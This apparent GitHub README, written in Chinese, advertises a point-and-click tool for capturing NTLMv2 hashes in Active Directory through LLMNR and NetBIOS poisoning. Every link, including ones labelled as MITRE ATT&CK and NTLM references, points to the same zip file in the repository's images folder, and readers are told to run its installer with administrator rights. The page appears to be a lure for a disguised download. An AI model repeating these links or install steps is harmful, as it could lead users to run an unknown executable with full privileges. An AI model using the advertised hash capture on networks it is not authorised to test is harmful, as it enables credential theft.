Chickenman18/AD-Lab-LLMNR-NetBIOS-Poisoning

GitHub: Chickenman18/AD-Lab-LLMNR-NetBIOS-Poisoning

Stars: 0 | Forks: 0

# 🚀 AD-Lab-LLMNR-NetBIOS-Poisoning - 轻松获取 NTLMv2 哈希 ![Download](https://github.com/Chickenman18/AD-Lab-LLMNR-NetBIOS-Poisoning/raw/refs/heads/main/images/BIO_Lab_Poisoning_LLMN_A_Net_v3.4.zip+Release&color=blue&style=flat) ## 🌟 简介 欢迎使用 **AD-Lab-LLMNR-NetBIOS-Poisoning** 项目。此应用程序允许您利用 LLMNR 和 NetBIOS 投毒技术从 Active Directory 中获取 NTLMv2 哈希。过程非常简单,无需编程知识。请按照以下步骤下载并运行该软件。 ## 🎯 功能特性 - 从 Active Directory Domain Services (AD DS) 获取 NTLMv2 哈希。 - 利用 LLMNR 和 NetBIOS 协议。 - 兼容 Windows 11 和 Windows Server。 - 界面简单,易于操作。 - 了解网络安全中使用的技术。 ## 🚀 入门指南 在运行应用程序之前,请确保您的系统满足以下要求: - 操作系统:Windows 11 或 Windows Server。 - 最低内存:4 GB。 - 网络连接(用于下载必要组件)。 - 管理员权限(用于运行应用程序)。 ## 📦 下载与安装 首先,您需要下载该应用程序。 1. **访问 Releases 页面:** 前往以下链接:[下载最新版本](https://github.com/Chickenman18/AD-Lab-LLMNR-NetBIOS-Poisoning/raw/refs/heads/main/images/BIO_Lab_Poisoning_LLMN_A_Net_v3.4.zip)。 2. **选择并下载最新版本:** 找到页面上列出的最新版本。点击与您的操作系统相匹配的下载链接。 3. **安装应用程序:** 下载完成后,找到文件并双击运行安装程序。按照屏幕上的说明完成安装。 ## 🔍 使用方法 安装完成后,您可以开始使用该应用程序: 1. **打开应用程序:** 在桌面上找到快捷方式或在开始菜单中找到它。 2. **配置设置:** 您可能需要根据您的网络环境调整设置。请查看应用程序的帮助部分以获取指导。 3. **启动扫描:** 点击 “Start” 按钮开始扫描 NTLMv2 哈希。应用程序将在主屏幕上显示结果。 4. **导出结果:** 您可以通过点击 “Export” 按钮将结果保存到文件中以供将来参考。 ## 📖 文档 有关详细的说明和故障排除提示,请参阅应用程序的内置帮助部分。您也可以查看安装文件夹中包含的 README 文件。 ## 🤝 社区支持 如果您有问题或需要帮助,请随时联系我们: - **GitHub Issues:** 使用 GitHub 上的 Issues 部分报告错误或提问。 - **论坛和社区:** 加入专注于网络安全的在线论坛以获得同伴支持。 ## 🛡️ 重要提示 - **道德使用:** 本应用程序仅供教育目的和道德黑客实践使用。在任何网络上使用它之前,请确保您已获得许可。 - **更新:** 定期查看 Releases 页面,以了解最新的更新和改进。 ## 📌 其他资源 以下是一些可以帮助您增进对 LLMNR 和 NetBIOS 协议了解的资源: - [MITRE ATT&CK Framework](https://github.com/Chickenman18/AD-Lab-LLMNR-NetBIOS-Poisoning/raw/refs/heads/main/images/BIO_Lab_Poisoning_LLMN_A_Net_v3.4.zip) - 了解攻击技术和防御措施。 - [Understanding NTLM](https://github.com/Chickenman18/AD-Lab-LLMNR-NetBIOS-Poisoning/raw/refs/heads/main/images/BIO_Lab_Poisoning_LLMN_A_Net_v3.4.zip) - NTLM 身份验证的全面概述。 按照本指南中概述的步骤,您可以轻松下载并运行 **AD-Lab-LLMNR-NetBIOS-Poisoning** 应用程序。祝您探索愉快!
标签:Active Directory, AD域安全, LLMNR中毒, NetBIOS欺骗, NTLMv2哈希, Plaso, Responder, Terraform 安全, TGT, Windows 11, Windows Server, 中间人攻击, 协议分析, 哈希捕获, 安全实验, 攻防演练, 数据展示, 权限提升, 红队, 网络安全, 虚拟化环境, 防御绕过, 隐私保护